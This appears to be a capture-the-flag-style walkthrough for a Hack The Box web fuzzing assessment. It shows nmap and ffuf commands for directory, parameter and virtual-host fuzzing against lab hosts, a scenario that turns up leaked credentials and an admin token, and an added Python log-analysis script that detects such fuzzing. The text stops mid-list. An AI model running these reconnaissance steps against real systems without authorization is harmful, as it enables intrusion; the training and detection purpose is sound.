Let’s simulate a typical HTB Skills Assessment scenario. You are given an IP: 10.10.10.200.
Step 1: Initial Scan (Nmap)
nmap -p- --min-rate 1000 10.10.10.200
# Output: 80/tcp open http
Step 2: Directory Fuzzing
ffuf -u http://10.10.10.200/FUZZ -w common.txt
# Finds: /assets (301), /hidden (200), /index.php (200)
Step 3: Recursive Fuzzing
Navigate to /hidden. It says "Access Denied". Fuzz inside /hidden/:
ffuf -u http://10.10.10.200/hidden/FUZZ -w directory-list-2.3-medium.txt
# Finds: /hidden/backup.zip (200)
Step 4: Download & Analyze
Download backup.zip. Unzip reveals creds.txt containing user:pass and a note: "API endpoint at /api/v1/status".
Step 5: Parameter Fuzzing on API
Browse to /api/v1/status. Returns JSON: "error": "missing param".
Fuzz for parameters:
ffuf -u http://10.10.10.200/api/v1/status?FUZZ=1 -w burp-parameter-names.txt -mr 'error'
You find user_id. Now fuzz the value:
ffuf -u http://10.10.10.200/api/v1/status?user_id=FUZZ -w numbers.txt -mr 'admin'
At user_id=1337, the response changes: "role": "admin", "token": "eyJhbG...". You have now passed the assessment's core objective.
If the page accepts POST data (common for login forms or API endpoints), you need to send data in the body.
Command:
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u http://<TARGET_IP>/admin/admin.php -X POST -d 'FUZZ=test' -H 'Content-Type: application/x-www-form-urlencoded'
Expected Outcome: You discover a parameter name (e.g., id, user, file) that changes the behavior of the page.
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt
This is where beginners fail the HTB assessment. You found a page like http://target.htb/api.php. It returns a blank page. Now what?
Parameter Fuzzing: You need to guess the HTTP parameter the script expects.
ffuf -u http://target.htb/api.php?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs 0
Flag -fs 0 filters out responses with a content size of 0 bytes (blank pages).
If you find a parameter like debug or file, you can then fuzz its value. For example, ?file=FUZZ to look for Local File Inclusion (LFI).
Virtual Host Fuzzing: The assessment may hide a second application on a different Virtual Host.
ffuf -u http://10.10.10.x/ -H "Host: FUZZ.target.htb" -w subdomains.txt -fs 5000
If you get a different response for admin.target.htb, add it to your /etc/hosts file and browse to it. This new vhost is often the actual target of the assessment.
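Seen from the web server, each of these phases (directory, vhost and parameter fuzzing) leaves its own footprint in the access log. The following script is an added example, not part of the original write-up: it parses constructed Apache combined-format lines with a leading virtual-host (%v) field (the log format, thresholds and client IPs are assumptions) and flags clients that show those footprints.

```python
import re
from collections import defaultdict

# Constructed Apache "combined" lines with a leading %v virtual-host field (not a real capture).
# Client 10.10.14.5 walks a wordlist, probes Host headers and churns parameter names on one
# endpoint; 192.0.2.10 is an ordinary visitor and must not be flagged.
SAMPLE_LOG = """\
target.htb 10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /assets HTTP/1.1" 301 0 "-" "Mozilla/5.0"
target.htb 10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin HTTP/1.1" 404 196 "-" "Mozilla/5.0"
target.htb 10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /images HTTP/1.1" 404 196 "-" "Mozilla/5.0"
target.htb 10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /tmp HTTP/1.1" 404 196 "-" "Mozilla/5.0"
dev.target.htb 10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
mail.target.htb 10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
target.htb 10.10.14.5 - - [01/Jan/2024:10:00:04 +0000] "GET /api/v1/status?id=1 HTTP/1.1" 200 25 "-" "Mozilla/5.0"
target.htb 10.10.14.5 - - [01/Jan/2024:10:00:04 +0000] "GET /api/v1/status?user=1 HTTP/1.1" 200 25 "-" "Mozilla/5.0"
target.htb 10.10.14.5 - - [01/Jan/2024:10:00:04 +0000] "GET /api/v1/status?user_id=1 HTTP/1.1" 200 40 "-" "Mozilla/5.0"
target.htb 192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 1820 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"$')

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None  # None for lines that do not fit the format

def fuzzing_report(log_text):
    """Per client IP, collect the signal each fuzzing phase leaves and report the ones that trip."""
    per_ip = defaultdict(lambda: {"missing": set(), "vhosts": set(), "params": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        s = per_ip[rec["ip"]]
        path, _, query = rec["target"].partition("?")
        if rec["status"] == "404":
            s["missing"].add(path)          # wordlist walks pile up distinct 404 paths
        s["vhosts"].add(rec["vhost"])        # Host-header fuzzing spreads one IP over many vhosts
        s["params"].update(kv.split("=", 1)[0] for kv in query.split("&") if kv)  # parameter churn
    checks = [("missing", 3, "distinct 404 paths (directory fuzzing)"),
              ("vhosts", 3, "distinct Host values (vhost fuzzing)"),
              ("params", 3, "distinct parameter names (parameter fuzzing)")]
    return {ip: [label for key, n, label in checks if len(s[key]) >= n]
            for ip, s in per_ip.items()
            if any(len(s[key]) >= n for key, n, _ in checks)}
```

Thresholds of 3 are deliberately low so the small sample trips them; on real logs they are tuned per site, and a 404-size filter (the same content-size logic ffuf uses with -fs) can cut noise from soft-404 pages.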
The HTB Skills Assessment expects you to be comfortable with command-line tools. While dirb and wfuzz are classics, the modern standard is ffuf (Fuzz Faster U Fool). We will focus on ffuf due to its speed, flexibility, and MATCH/FILTER logic.
Install ffuf (if you haven't):
sudo apt install ffuf -y
# Or from source (current Go toolchains): go install github.com/ffuf/ffuf/v2@latest
Critical Wordlists (Seclists): HTB often provides a small wordlist, but real success requires the SecLists repository.
sudo apt install seclists -y
# Located in /usr/share/seclists/
Key lists for the assessment: